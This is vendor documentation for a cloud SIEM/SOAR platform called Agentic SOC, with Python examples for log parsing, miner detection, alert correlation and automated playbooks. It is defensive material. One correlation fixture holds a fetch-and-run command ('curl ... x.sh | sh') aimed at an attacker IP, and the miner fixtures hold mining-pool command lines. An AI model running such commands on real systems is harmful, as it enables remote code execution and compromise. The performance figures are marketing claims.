Agentic SOC is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) platform. It centralizes log collection and threat analysis across multicloud and multi-account environments, applies built-in detection rules and AI models to identify threats automatically, and orchestrates automated response through playbooks — eliminating the data silos, slow threat discovery, and manual response bottlenecks common in traditional security operations.
Use cases
Unified multicloud log management
Challenge: Security logs scattered across multicloud and hybrid cloud environments arrive in inconsistent formats, creating data silos. Without a unified view, tracing cross-cloud attacks and running centralized audits requires significant manual effort.
How Agentic SOC helps:
Unified log ingestion: Ingests heterogeneous logs from multicloud, third-party, and on-premises environments into a single data lake. Supports connectors for services such as Amazon S3 and Apache Kafka.
Intelligent parsing and normalization: Uses a flexible parsing engine with field mapping to transform unstructured raw logs into a unified, standardized data model in real time.
Global analysis and tracing: Runs unified threat detection, cross-cloud attack tracing, and compliance auditing on top of the normalized data.
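As an added illustration of the parsing and field-mapping step (example code written for this page, not Agentic SOC's own parsing engine), the block below takes three constructed log lines in three different formats, detects the format, parses each, and maps vendor field names onto one unified schema so that a single entity pivot spans all sources. The sample lines, the unified field names, and the assumption that the firewall logs UTC timestamps are all hypothetical.

```python
import json
import re
from datetime import datetime, timezone

# Constructed sample logs, one per source format. They are not product output;
# IPs are from the RFC 5737 documentation ranges.
SAMPLE_LOGS = [
    # key=value firewall log in the style of a Fortinet device
    'date=2025-04-03 time=10:15:02 devname="fw-edge-1" srcip=203.0.113.10 '
    'dstip=10.0.0.5 dstport=443 action="deny" msg="blocked by policy"',
    # JSON WAF log
    '{"ts": 1743675310, "client_ip": "203.0.113.10", "host": "shop.example.com", '
    '"uri": "/upload.php", "rule": "webshell_upload", "verdict": "block"}',
    # syslog-style host log
    '2025-04-03T10:15:20Z web-01 sshd[1234]: Failed password for root from 198.51.100.7 port 51022 ssh2',
]

# Field maps: vendor field name -> unified field name. Only mapped fields are kept,
# so every source lands in the same schema and the same detection rules apply to all.
FIELD_MAPS = {
    'fortinet_fw': {'srcip': 'src_ip', 'dstip': 'dst_ip', 'dstport': 'dst_port',
                    'devname': 'host', 'action': 'action', 'msg': 'message'},
    'json_waf': {'client_ip': 'src_ip', 'host': 'dst_host', 'uri': 'url_path',
                 'rule': 'rule_name', 'verdict': 'action'},
    'syslog_host': {'host': 'host', 'program': 'program', 'user': 'user',
                    'src_ip': 'src_ip', 'src_port': 'src_port'},
}
INT_FIELDS = {'dst_port', 'src_port'}

KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')
SYSLOG_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+?)\[(\d+)\]:\s+(.*)$')
SSH_FAIL_RE = re.compile(r'Failed password for (\S+) from (\S+) port (\d+)')


def parse_kv(line):
    """Parse key=value pairs; quoted values may contain spaces."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
            for m in KV_RE.finditer(line)}


def detect_and_parse(line):
    """Pick a parser from the shape of the line and return (source, raw_fields)."""
    s = line.strip()
    if s.startswith('{'):
        return 'json_waf', json.loads(s)
    if re.match(r'^\w+=', s):
        return 'fortinet_fw', parse_kv(s)
    m = SYSLOG_RE.match(s)
    if m:
        fields = {'timestamp': m.group(1), 'host': m.group(2), 'program': m.group(3),
                  'pid': m.group(4), 'message': m.group(5)}
        f = SSH_FAIL_RE.search(fields['message'])
        if f:  # pull entities out of the free-text message
            fields.update(user=f.group(1), src_ip=f.group(2), src_port=f.group(3))
        return 'syslog_host', fields
    raise ValueError('unrecognized log format: ' + s[:40])


def event_time(source, fields):
    """Each source encodes time differently; normalize all to timezone-aware UTC.
    The firewall timestamp is assumed to be UTC (devices often log local time,
    so verify the device configuration before trusting this)."""
    if source == 'fortinet_fw':
        dt = datetime.strptime(fields['date'] + ' ' + fields['time'], '%Y-%m-%d %H:%M:%S')
        return dt.replace(tzinfo=timezone.utc)
    if source == 'json_waf':
        return datetime.fromtimestamp(int(fields['ts']), tz=timezone.utc)
    return datetime.strptime(fields['timestamp'], '%Y-%m-%dT%H:%M:%SZ').replace(tzinfo=timezone.utc)


def normalize(line):
    """Map one raw log line onto the unified schema; the raw line is kept for forensics."""
    source, fields = detect_and_parse(line)
    event = {'source': source, 'event_time': event_time(source, fields).isoformat(), 'raw': line}
    for vendor_field, unified_field in FIELD_MAPS[source].items():
        if vendor_field in fields:
            value = fields[vendor_field]
            event[unified_field] = int(value) if unified_field in INT_FIELDS else value
    return event


def normalize_all(lines):
    return [normalize(line) for line in lines]


def events_by_src_ip(events):
    """Once normalized, events from any source can be pivoted on the same entity."""
    index = {}
    for e in events:
        if 'src_ip' in e:
            index.setdefault(e['src_ip'], []).append(e)
    return index


if __name__ == '__main__':
    for ip, evs in events_by_src_ip(normalize_all(SAMPLE_LOGS)).items():
        print(ip, [(e['source'], e['event_time']) for e in evs])
```

The pivot at the end is the point of normalization: the firewall deny and the WAF block for 203.0.113.10 come from different vendors with different field names, yet after mapping they are found with one lookup. In a real deployment the parsers would be driven by per-source mapping configuration rather than hard-coded regexes, but the shape (detect, parse, map, coerce types, keep the raw line) is the same.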
Web intrusion investigation
Challenge: After a web application is compromised, attackers typically chain multiple vulnerabilities together. Manually correlating logs from WAF, host security, and network traffic to reconstruct the attack sequence is time-consuming and error-prone.
How Agentic SOC helps:
Automated detection and correlation: Agentic SOC collects and analyzes Web Application Firewall (WAF) logs and host security logs. When it detects activities such as WebShell uploads and abnormal process executions, it automatically correlates individual alerts into a single, comprehensive Web Intrusion incident.
Attack path reconstruction: The incident detail page displays the complete attack timeline — from initial web access and vulnerability exploitation through WebShell writes, reverse shell execution, and malicious command execution.
Automated response: Run the Block Source IP via Cloud Firewall playbook to automatically instruct Cloud Firewall to block the attacker's source IP at the network edge.
Cryptomining malware remediation
Challenge: Cryptomining malware consumes significant compute resources, driving up cloud costs and degrading performance for legitimate workloads. The manual remediation process — locating the process, terminating the file, blocking mining pool connections, and patching the entry point — is slow and error-prone.
How Agentic SOC helps:
Precise detection: Agentic SOC combines host security logs, VPC flow logs, and built-in threat intelligence to identify cryptomining processes such as xmrig and anomalous network connections to mining pools, generating a Cryptomining Activity incident.
AI-assisted analysis: The AI Assistant analyzes the incident and recommends response actions based on historical cases and best practices — for example, "terminate the malicious process and block the mining pool IP."
Automated response: Select Use Recommended Response Policy to run a playbook that terminates the malicious process and quarantines the cryptomining file.
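The detection logic behind this use case, as an added example written for this page (not the product's own rules): host process-start events and VPC flow records are checked against a constructed mining-pool threat-intel set, a Stratum-port heuristic, and miner command-line patterns, and a host is escalated to a Cryptomining Activity incident only when a suspicious process and a pool connection appear on it within a short window. It goes one step beyond the text by showing why the process name alone is not enough: a miner renamed to look like a kernel thread is still caught by its command line and its pool connection. The pool IPs, the event schema, the port list, and the VPC address ranges are assumptions for the example.

```python
import re
from ipaddress import ip_address, ip_network

# --- Constructed inputs (not product data or a real feed) ---
# Threat-intel list of mining-pool IPs; RFC 5737 documentation addresses stand in for real pools.
POOL_IPS = {'198.51.100.23', '203.0.113.77'}
# Ports commonly used by the Stratum mining protocol: a heuristic, weaker than threat intel.
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444, 45700}
KNOWN_MINERS = {'xmrig', 'minerd', 'cpuminer', 'ethminer'}
# Command-line patterns shared by common miners; these catch a renamed binary.
MINER_CMDLINE_RE = re.compile(
    r'(stratum\+(tcp|ssl)://|--donate-level|--coin[= ]|--algo[= ]|-o\s+\S+:\d+\s+-u\s+)', re.I)
# Assumed VPC address plan: Stratum-port traffic that stays inside these ranges is not alerted on.
INTERNAL_NETS = [ip_network('10.0.0.0/8'), ip_network('172.16.0.0/12'), ip_network('192.168.0.0/16')]

# Host security process-start events (times in seconds, already normalized)
PROCESS_EVENTS = [
    {'time': 100, 'host': 'ecs-web-01', 'pid': 4711, 'process': 'xmrig',
     'cmdline': '/tmp/xmrig -o pool.example:3333 -u 4Awallet --donate-level 0'},
    # miner renamed to look like a kernel thread: the name check misses it, the command line does not
    {'time': 130, 'host': 'ecs-db-02', 'pid': 2210, 'process': 'kworkerds',
     'cmdline': '/usr/bin/kworkerds -o stratum+tcp://203.0.113.77:14444 -u wallet -p x'},
    # benign process with a lookalike flag
    {'time': 140, 'host': 'ecs-app-03', 'pid': 900, 'process': 'java',
     'cmdline': 'java -jar app.jar --coin-service'},
]
# VPC flow log events
FLOW_EVENTS = [
    {'time': 105, 'host': 'ecs-web-01', 'src_ip': '10.0.1.10', 'dst_ip': '198.51.100.23', 'dst_port': 3333},
    {'time': 131, 'host': 'ecs-db-02', 'src_ip': '10.0.2.20', 'dst_ip': '203.0.113.77', 'dst_port': 14444},
    {'time': 150, 'host': 'ecs-app-03', 'src_ip': '10.0.3.30', 'dst_ip': '10.0.9.9', 'dst_port': 5555},    # internal
    {'time': 160, 'host': 'ecs-app-03', 'src_ip': '10.0.3.30', 'dst_ip': '192.0.2.15', 'dst_port': 4444},  # external, no intel hit
]


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_miner_process(ev):
    """Return the reasons a process-start event looks like a miner (empty list = benign)."""
    reasons = []
    if ev['process'].lower() in KNOWN_MINERS:
        reasons.append('known miner binary name')
    if MINER_CMDLINE_RE.search(ev['cmdline']):
        reasons.append('mining command-line pattern')
    return reasons


def detect_pool_connection(ev):
    """Threat intel is authoritative; the port heuristic only fires for traffic leaving the VPC."""
    if ev['dst_ip'] in POOL_IPS:
        return ['destination in mining-pool threat intel']
    if ev['dst_port'] in STRATUM_PORTS and not is_internal(ev['dst_ip']):
        return ['stratum port to external IP']
    return []


def generate_alerts(process_events, flow_events):
    alerts = []
    for ev in process_events:
        reasons = detect_miner_process(ev)
        if reasons:
            alerts.append({'type': 'suspicious_miner_process', 'host': ev['host'], 'time': ev['time'],
                           'entity': f"{ev['host']}:pid:{ev['pid']}", 'reasons': reasons})
    for ev in flow_events:
        reasons = detect_pool_connection(ev)
        if reasons:
            alerts.append({'type': 'mining_pool_connection', 'host': ev['host'], 'time': ev['time'],
                           'entity': ev['dst_ip'], 'reasons': reasons})
    return alerts


def build_cryptomining_incidents(alerts, window=600):
    """Escalate to a Cryptomining Activity incident only when one host shows a suspicious
    process and a pool connection within `window` seconds; a lone signal stays an alert."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a['host'], []).append(a)
    incidents = []
    for host, host_alerts in by_host.items():
        procs = [a for a in host_alerts if a['type'] == 'suspicious_miner_process']
        nets = [a for a in host_alerts if a['type'] == 'mining_pool_connection']
        for p in procs:
            pools = sorted({n['entity'] for n in nets if abs(n['time'] - p['time']) <= window})
            if pools:
                incidents.append({
                    'name': 'Cryptomining Activity', 'host': host, 'process': p['entity'],
                    'pool_ips': pools,
                    'recommended_actions': [f"terminate {p['entity']}", 'quarantine miner file']
                                           + [f'block pool IP {ip}' for ip in pools],
                })
    return incidents


if __name__ == '__main__':
    for inc in build_cryptomining_incidents(generate_alerts(PROCESS_EVENTS, FLOW_EVENTS)):
        print(inc['host'], inc['recommended_actions'])
```

With these inputs, ecs-web-01 and ecs-db-02 each become an incident. ecs-app-03 does not: its internal connection on port 5555 is ignored, and its single low-confidence Stratum-port alert has no matching process evidence, which is exactly the kind of signal that should stay an alert rather than trigger an automated response.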
How it works
Agentic SOC follows a four-stage workflow from raw log collection to automated response:
Log collection and parsing: Collects raw logs from cloud products, third-party devices, and business applications.
Alert generation: Identifies potential threats from large log volumes using built-in detection rules, or ingests native alerts directly from third-party products.
Incident aggregation and handling: Correlates multiple alerts describing the same attack into a single incident using configurable correlation rules and graph computing models.
Response orchestration: Triggers playbooks automatically based on predefined conditions, or manually. Playbooks invoke component actions to generate response policies and dispatch response tasks for automated remediation.
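An added example of stage 3, and of how the Web Intrusion use case above is assembled from WAF, host, and flow alerts (example code written for this page, not the product's correlation rules or graph engine): alerts are nodes, shared entities within a time window are edges, connected components become incidents, and each incident's alerts are ordered into a timeline and matched against the Web Intrusion stages. The alert schema, the entity types used for linking, and the one-hour window are assumptions.

```python
from collections import defaultdict

# Alerts that share one of these entity types within WINDOW seconds are linked.
# 'process' is deliberately excluded: names like bash or php-fpm appear everywhere
# and would chain unrelated alerts together.
CORRELATION_KEYS = {'ip', 'host', 'file_hash'}
WINDOW = 3600  # seconds (assumption)

# Stages of the Web Intrusion scenario, in attack order, and the alert types that evidence them.
WEB_INTRUSION_STAGES = [
    ('initial_access', {'webshell_upload', 'sql_injection_attempt'}),
    ('webshell_write', {'webshell_file_write'}),
    ('reverse_shell', {'reverse_shell', 'outbound_c2_connection'}),
    ('command_execution', {'malicious_command'}),
]

# Constructed alerts from three sources (WAF, host security, flow logs); not product output.
ALERTS = [
    {'id': 'a1', 'time': 1000, 'source': 'waf', 'type': 'webshell_upload',
     'entities': {'ip': '203.0.113.10', 'host': 'web-01', 'url': '/upload.php'}},
    {'id': 'a2', 'time': 1005, 'source': 'host', 'type': 'webshell_file_write',
     'entities': {'host': 'web-01', 'file_hash': 'sha256:0c0ffee0001', 'process': 'php-fpm'}},
    {'id': 'a3', 'time': 1060, 'source': 'host', 'type': 'reverse_shell',
     'entities': {'host': 'web-01', 'process': 'bash', 'ip': '203.0.113.10'}},
    {'id': 'a4', 'time': 1062, 'source': 'flow', 'type': 'outbound_c2_connection',
     'entities': {'host': 'web-01', 'ip': '203.0.113.10', 'dst_port': 4444}},
    {'id': 'a5', 'time': 1100, 'source': 'host', 'type': 'malicious_command',
     'entities': {'host': 'web-01', 'process': 'bash', 'cmd': 'curl http://203.0.113.10/x.sh | sh'}},
    # unrelated activity against another host
    {'id': 'a6', 'time': 5000, 'source': 'waf', 'type': 'sql_injection_attempt',
     'entities': {'ip': '198.51.100.9', 'host': 'web-02'}},
    # same host, but hours later: outside the window, so not pulled into the incident
    {'id': 'a7', 'time': 9000, 'source': 'host', 'type': 'brute_force_login',
     'entities': {'host': 'web-01', 'ip': '192.0.2.44'}},
]


def correlate(alerts, window=WINDOW, keys=CORRELATION_KEYS):
    """Group alerts into connected components of the alert-entity graph.
    Two alerts are connected when they share an entity and the later one occurs
    within `window` seconds of the previous alert on that entity. Union-find keeps
    this near-linear in the number of alerts."""
    parent = list(range(len(alerts)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    def union(i, j):
        ri, rj = find(i), find(j)
        if ri != rj:
            parent[rj] = ri

    index = defaultdict(list)  # (entity_type, value) -> alert positions
    for i, a in enumerate(alerts):
        for k, v in a['entities'].items():
            if k in keys:
                index[(k, v)].append(i)
    for members in index.values():
        members.sort(key=lambda i: alerts[i]['time'])
        for x, y in zip(members, members[1:]):
            if alerts[y]['time'] - alerts[x]['time'] <= window:
                union(x, y)
    groups = defaultdict(list)
    for i, a in enumerate(alerts):
        groups[find(i)].append(a)
    return [sorted(g, key=lambda a: a['time']) for g in groups.values()]


def build_incidents(alerts):
    """Turn multi-alert groups into incidents with a stage list and an attack timeline."""
    incidents = []
    for group in correlate(alerts):
        if len(group) < 2:
            continue  # a lone alert is not escalated into an incident
        stages = [name for name, types in WEB_INTRUSION_STAGES if any(a['type'] in types for a in group)]
        post_exploit = [s for s in stages if s != 'initial_access']
        name = 'Web Intrusion' if 'initial_access' in stages and post_exploit else 'Correlated Activity'
        entities = defaultdict(set)
        for a in group:
            for k, v in a['entities'].items():
                entities[k].add(v)
        incidents.append({
            'name': name,
            'alerts': [a['id'] for a in group],
            'stages': stages,
            'attacker_ips': sorted(entities['ip']),
            'hosts': sorted(entities['host']),
            'timeline': [(a['time'], a['source'], a['type']) for a in group],
        })
    return incidents


if __name__ == '__main__':
    for inc in build_incidents(ALERTS):
        print(inc['name'], inc['alerts'], '->', inc['stages'])
```

Two choices matter in practice. Linking only on discriminating entities (IP, host, file hash) and only within a time window stops a busy host from snowballing every alert it ever raised into one incident, which is why a7 stays separate here. Requiring both an initial-access alert and post-exploitation evidence before naming the group a Web Intrusion keeps a blocked upload attempt with nothing behind it from being escalated.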
Key concepts
| Concept | Definition | Learn more |
|---|---|---|
| Entity | A core object involved in an alert or incident — such as an IP address, domain name, file hash, process, host, container, cloud resource ID (for example, an ECS instance ID), or user account. Entities form the foundation for correlating alerts and reconstructing an attack path. | — |
| Incident | A high-fidelity security event created by correlating multiple related alerts from various data sources, using built-in rules and graph computing models. Agentic SOC aggregates alerts into a single incident and automatically reconstructs the attack timeline. | — |
| Response policy | Specifies the handling action for an entity in a given scenario. Each response action performed on an entity generates a unique policy. | — |
| Response task | An individual, executable job generated from a response policy and targeted at a specific scope. Each response policy for an entity is broken down into one or more response tasks based on the application scope. | — |
| Response orchestration | The process of organizing and managing security response actions through automated workflows (playbooks). Response orchestration automatically runs a series of operations based on predefined logic to handle incidents. | — |
| Playbook | A predefined, automated security workflow consisting of triggers, conditions, actions, and endpoints. Supports drag-and-drop graphical editing, letting you customize response logic for specific incident types such as cryptomining or ransomware. | — |
| Component | An interface that connects to and operates external systems or services. Components are the building blocks that execute specific actions within a playbook. | — |
| Resource instance | The specific service instance that an action targets — for example, a Cloud Firewall instance. | — |
| Action | A specific capability executed by a component. A single component may contain multiple actions. For example, an endpoint management component might include actions such as disable account, isolate network, and send notification. | — |
| Agent | An intelligent entity that perceives its environment, makes decisions, and takes actions autonomously. Agentic SOC uses a hierarchical multi-Agent collaborative architecture where a Team Leader coordinates specialized Agent teams responsible for threat detection, incident investigation, impact assessment, and user interaction. | Security Operations Agent details |
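
To make the response concepts in the table concrete, the block below is an added example, written for this page and not the product's orchestration engine, of how a playbook expands an incident into response policies (one per entity and action) and then into response tasks (one per resource instance in scope), executing each against a component action. The Cloud Firewall and host-security components are offline stand-ins, the resource instance IDs and incident fields are hypothetical, and the never-block allowlist is an assumption about the environment.

```python
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class Component:
    """Connector to an external system. Each action is a callable (entity, resource_instance) -> str."""
    name: str
    actions: dict


@dataclass
class ResponsePolicy:
    """One handling decision for one entity: the action and the scope it applies to."""
    entity: str
    entity_type: str
    action: str
    component: str
    scope: list = field(default_factory=list)  # resource instances


@dataclass
class ResponseTask:
    """One executable job: a policy applied to a single resource instance."""
    policy: ResponsePolicy
    instance: str
    status: str = 'pending'
    result: str = ''


class FakeCloudFirewall:
    """Stand-in for a firewall API so the example runs offline; records blocks per instance."""
    def __init__(self):
        self.blocklist = defaultdict(set)

    def block_source_ip(self, ip, instance):
        self.blocklist[instance].add(ip)
        return f'blocked {ip} on {instance}'


class FakeHostSecurity:
    def __init__(self):
        self.terminated = []

    def terminate_process(self, entity, instance):
        host, _, pid = entity.partition(':pid:')
        if not pid.isdigit():
            raise ValueError(f'malformed process entity {entity!r}')
        self.terminated.append((instance, host, int(pid)))
        return f'terminated pid {pid} on {host}'


# Egress/NAT addresses that must never be blocked even if they surface as an attacker IP
# (constructed). Guards an automated playbook against locking out your own scanners or VPN.
NEVER_BLOCK = {'198.51.100.1'}

# Playbook: trigger on incident type, gate on a condition, then one step per component action.
PLAYBOOK = {
    'name': 'Block Source IP and Terminate Miner',
    'trigger': 'Cryptomining Activity',
    'condition': lambda inc: inc['severity'] in {'high', 'critical'},
    'steps': [
        {'component': 'cloud_firewall', 'action': 'block_source_ip', 'entity_type': 'attacker_ip',
         'skip': lambda e: e in NEVER_BLOCK},
        {'component': 'host_security', 'action': 'terminate_process', 'entity_type': 'process',
         'skip': lambda e: False},
    ],
}
# Hypothetical resource instance IDs, not real identifiers.
RESOURCE_INSTANCES = {'cloud_firewall': ['cfw-region-a', 'cfw-region-b'], 'host_security': ['sas-default']}


def run_playbook(playbook, incident, components, instances):
    """Expand incident entities into response policies, fan each policy out into one task
    per in-scope resource instance, and execute the tasks. Failures are recorded per task,
    so one bad entity does not abort the rest of the response."""
    if incident['name'] != playbook['trigger'] or not playbook['condition'](incident):
        return [], []
    policies, tasks = [], []
    for step in playbook['steps']:
        comp = components[step['component']]
        for entity in incident['entities'].get(step['entity_type'], []):
            if step['skip'](entity):
                continue
            policy = ResponsePolicy(entity, step['entity_type'], step['action'], comp.name,
                                    list(instances[step['component']]))
            policies.append(policy)
            for inst in policy.scope:
                task = ResponseTask(policy, inst)
                try:
                    task.result = comp.actions[step['action']](entity, inst)
                    task.status = 'success'
                except Exception as exc:
                    task.status, task.result = 'failed', str(exc)
                tasks.append(task)
    return policies, tasks


def demo():
    """Run the playbook against a constructed incident and return what it did."""
    fw, hs = FakeCloudFirewall(), FakeHostSecurity()
    components = {
        'cloud_firewall': Component('Cloud Firewall', {'block_source_ip': fw.block_source_ip}),
        'host_security': Component('Host Security', {'terminate_process': hs.terminate_process}),
    }
    incident = {'name': 'Cryptomining Activity', 'severity': 'high',
                'entities': {'attacker_ip': ['203.0.113.77', '198.51.100.1'],
                             'process': ['ecs-db-02:pid:2210', 'ecs-db-02:pid:notanumber']}}
    policies, tasks = run_playbook(PLAYBOOK, incident, components, RESOURCE_INSTANCES)
    return policies, tasks, fw, hs


if __name__ == '__main__':
    for task in demo()[1]:
        print(task.policy.action, task.instance, task.status, task.result)
```

The one block policy for 203.0.113.77 becomes two tasks because the Cloud Firewall scope has two instances, which is the policy-to-task decomposition the table describes. The allowlisted NAT address produces no policy at all, and the malformed process entity produces a policy whose single task fails and is recorded as failed without stopping the valid termination next to it; both are checks worth building into any playbook that runs without a human in the loop.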
AI Agent architecture
The Agentic SOC Agent architecture deeply integrates Alibaba Cloud's cloud-native security data domain infrastructure. Built on large security language models, it delivers an end-to-end AI Agent security expert team that automatically senses threats, performs deep reasoning, runs collaborative investigations, and closes the loop quickly.
Three-layer architecture
| Layer | Components | Responsibilities |
|---|---|---|
| Cloud-Native Engine layer | Simple Log Service (SLS), Flink/timed SQL detection engine, Igraph graph computing, Large Language Model (LLM) Qwen, SOAR orchestration engine | Foundational data storage, computing, and AI capabilities |
| Agent Management Platform | Built on AgentRun | Manages Agent lifecycles, task scheduling, memory, and tool-calling orchestration |
| Agent Intelligence layer | Team Leader plus multiple specialized Agent teams | Autonomous reasoning and decision-making for security operations tasks |
Each Agent operates on the ReAct reasoning framework: perceive the environment → reason and analyze → plan actions → execute → observe results. This cycle repeats until the task is complete.
Team Leader and specialized Agent teams
The architecture uses a hierarchical multi-Agent collaborative model:
Team Leader: Built on the Qwen series of models, the Team Leader is the central dispatch node responsible for global scheduling, task decomposition, and complex decision-making.
Specialized Agent teams: Each team executes tasks independently in its domain and collaborates with the others.
| Team | Responsibilities | Core agents |
|---|---|---|
| Threat Detection | Performs deep analysis on large volumes of multi-source, heterogeneous data to identify known and unknown threats | Process Chain Analysis Agent, Network Behavior Analysis Agent, File Behavior Analysis Agent, Persistence Detection Agent |
| Incident Investigation | Autonomously completes incident investigations based on the ReAct framework to reconstruct attack paths and timelines | Attack Path Reconstruction Agent, IOC Extraction Agent, Action Validation Agent, Response Agent |
| Impact Assessment | Assesses the scope and risk level of security incidents | Lateral Movement Investigation Agent, Risk Time Window Inspection Agent, Risk Correlation Analysis Agent |
| User Interaction | Interacts with security operations personnel to provide consultation and analytical support | Investigation Deepening Trigger Agent, Inspection Task Setting Agent, Security Consultation (RAG) Agent |
Agent support varies by Agentic SOC edition. For details about version differences and billing, see Differences between Agentic SOC Basic Edition and Security Operations Agent.
Benefits
Agentic SOC integrates an AI Agent engine into the core of security operations, enabling a smart auto-pilot mode that scales from human-machine collaboration to fully automated response.
High-fidelity detection with a 99.94% alert reduction rate: Combines global threat intelligence, graph computing, and cloud-native log analysis to accurately identify new, unknown, and highly evasive threats from large alert volumes. Average detection time for security incidents is reduced to minutes.
Automated response in seconds with 95% remediation coverage: Provides one-click response policies and out-of-the-box automated playbooks that are customizable and ready to use without manual configuration. Coordinates with security products and infrastructure to deliver fully automated analysis and response. The Security Operations Agent — a premium intelligent service powered by the Agentic AI engine — deeply integrates with Alibaba Cloud's native security data and infrastructure. It uses autonomous perception, reasoning, and execution to independently analyze security incidents and accelerate response.
Full attack picture reconstruction with AI-assisted decision-making: Uses graph computing and a security large language model to automatically trace and reconstruct the complete attack path and timeline. The built-in AI Assistant summarizes incidents and provides precise response recommendations.
Unified global view with a 90% cross-asset incident discovery rate: Unifies collection and processing of log data from across clouds, accounts, and products, reducing the complexity of hybrid cloud security operations. Centralized management and auditing provide global security insights and simplify compliance efforts.
Security operations efficiency
Mean Time To Detect (MTTD), Mean Time To Acknowledge (MTTA), and Mean Time To Respond (MTTR) are standard metrics for measuring security operations efficiency. The following data is based on statistics from real users.
Efficiency overview
| Metric | Traditional methods | Agentic SOC | Efficiency gain |
|---|---|---|---|
| MTTD (Detection) | Hours | 5 minutes | From hours to minutes |
| MTTA (Acknowledgment) | Days | 35 minutes | From days to minutes |
| MTTR (Response) | Days / Weeks | 90 minutes | From weeks/days to 90 minutes |
Metric details
MTTD (Mean Time To Detect): The average time from when an attack occurs to when the system first detects it. Agentic SOC reduces threat detection from hours to 5 minutes, shrinking attacker dwell time and creating a critical window for rapid response.
MTTA (Mean Time To Acknowledge): The average time from when an incident is detected to when the security team confirms it as a true threat. Agentic SOC automatically investigates and traces threats after detection, reducing manual analysis from days to 35 minutes.
MTTR (Mean Time To Respond): The average time from when a threat is confirmed to when the system is fully remediated and restored. Agentic SOC uses automated, predefined playbooks to execute critical actions from confirmation to response in seconds, reducing overall response time from days to 90 minutes and freeing security teams from repetitive tasks to focus on deeper threat analysis.
Agent processing efficiency
| Metric | Description |
|---|---|
| Autonomous investigation and analysis rate: 81% | AI Agents independently complete Level 1 and Level 2 incident analysis — validated against full alert data with zero human intervention |
| Alert correlation and aggregate event convergence rate: 99.94% | Processes tens of thousands to millions of alerts weekly, converging them into hundreds of security events |
| Incident traceability report generation: 100x faster | Generates full attack chain reports in minutes — compared to hours for manual analysis |
| Log onboarding and standardization efficiency: 90% | Uses semantic recognition to automatically parse and map logs from heterogeneous data sources to a unified security model, and generates SPL with one click |
Supported products and logs
Agentic SOC natively supports logs from vendors including Alibaba Cloud, Huawei Cloud, Tencent Cloud, Fortinet, Chaitin, and Sangfor. It also supports data ingestion from custom products.
For details about default ingestion policies, data sources, and standardization rules, go to the Agentic SOC console.
| Vendor | Product | Log type |
|---|---|---|
| Alibaba Cloud | Security Center | Network defense alert logs, cloud platform configuration check logs, baseline logs, security alert logs, vulnerability logs, Runtime Application Self-Protection (RASP) alert logs, and cloud security posture management logs; account snapshot logs, network snapshot logs, and process snapshot logs; host logon failure logs, DNS request logs, logon trail logs, process startup logs, network connection logs, and brute-force attack logs |
| Alibaba Cloud | Web Application Firewall (WAF) | WAF full logs, blocked logs, blocked and observed logs, anti-crawler full logs, API security event alert logs, API risk logs, and WAF alert logs |
| Alibaba Cloud | Cloud Firewall | Cloud Firewall alert logs, Cloud Firewall traffic logs, NDR HTTP logs, NDR DNS logs, and NDR event alert logs |
| Alibaba Cloud | Anti-DDoS | Anti-DDoS Pro and Anti-DDoS Premium full logs |
| Alibaba Cloud | Bastionhost | Bastionhost logs |
| Alibaba Cloud | CDN | CDN flow logs |
| Alibaba Cloud | Edge Security Acceleration (ESA) | DCDN user access logs and DCDN WAF blocked logs |
| Alibaba Cloud | API Gateway | API Gateway logs |
| Alibaba Cloud | Container Service for Kubernetes (ACK) | Kubernetes audit logs |
| Alibaba Cloud | PolarDB | PolarDB-X 1.0 SQL audit logs and PolarDB-X 2.0 SQL audit logs |
| Alibaba Cloud | ApsaraDB for MongoDB | MongoDB audit logs |
| Alibaba Cloud | ApsaraDB RDS | RDS SQL audit logs |
| Alibaba Cloud | Virtual Private Cloud (VPC) | VPC flow logs |
| Alibaba Cloud | Elastic IP Address (EIP) | Elastic IP Address logs |
| Alibaba Cloud | Server Load Balancer (SLB) | ALB access logs and CLB access logs |
| Alibaba Cloud | Object Storage Service (OSS) | OSS access logs |
| Alibaba Cloud | ActionTrail | ActionTrail event logs |
| Alibaba Cloud | CloudConfig | Configuration audit logs |
| Alibaba Cloud | File Storage NAS | NAS NFS operational logs |
| Alibaba Cloud | AI Guardrails | Alibaba Cloud AI Security Guardrail logs |
| Tencent Cloud | Web Application Firewall | Tencent Cloud Web Application Firewall alert logs |
| Tencent Cloud | Cloud Firewall | Tencent Cloud Firewall alert logs |
| Huawei Cloud | Web Application Firewall | Huawei Cloud Web Application Firewall alert logs |
| Huawei Cloud | Cloud Firewall | Huawei Cloud Firewall alert logs |
| Azure | Windows Defender for Endpoint | Endpoint alert logs |
| Azure | Azure Active Directory | Azure Active Directory audit logs and Azure Active Directory logon audit logs |
| Azure | Activity | Audit logs |
| Azure | SQL Database | SQL Server audit logs |
| AWS | CloudTrail | CloudTrail logs |
| AWS | Redshift | Redshift audit logs |
| AWS | GuardDuty | GuardDuty finding alert logs |
| AWS | PostgreSQL on Amazon RDS | PostgreSQL event logs |
| Volcengine | Security Center | HIDS alert logs |
| Fortinet | Fortinet Firewall | Fortinet Firewall alert logs, Fortinet Firewall flow logs, and Fortinet audit logs |
| Chaitin | Chaitin WAF | Chaitin WAF alert logs and Chaitin WAF flow logs |
| Microsoft | Endpoint event logs | Windows security event logs |
| Sangfor | Sangfor Endpoint Secure aES (EDR) | Endpoint detection and response alert logs |
| Hillstone Networks | Hillstone Networks Firewall | Hillstone Networks Firewall alert logs |
| Tophant | Tophant Full-Traffic Security Computing and Analysis Platform | Tophant Full-Traffic Security Computing and Analysis Platform product alert logs |
| SkyGuard | DLP | DLP alert logs |
| Threatbook | OneSEC | OneSEC alert logs |
| Cisco | Cisco Firepower Firewall | Firewall alert logs |
| Palo Alto | Next-Generation Firewall | Firewall alert logs |
| Palo Alto | Cortex XDR | Palo Alto Cortex alert logs and endpoint alert logs |
| Palo Alto | Panorama | Panorama product logs |
| Ege Cloud | Polaris | Layer 4 internal network access logs and data audit logs |
| Custom vendor | Custom product | Firewall alert logs, firewall traffic logs, Web Application Firewall (WAF) alert logs, and WAF traffic logs |
Version upgrade
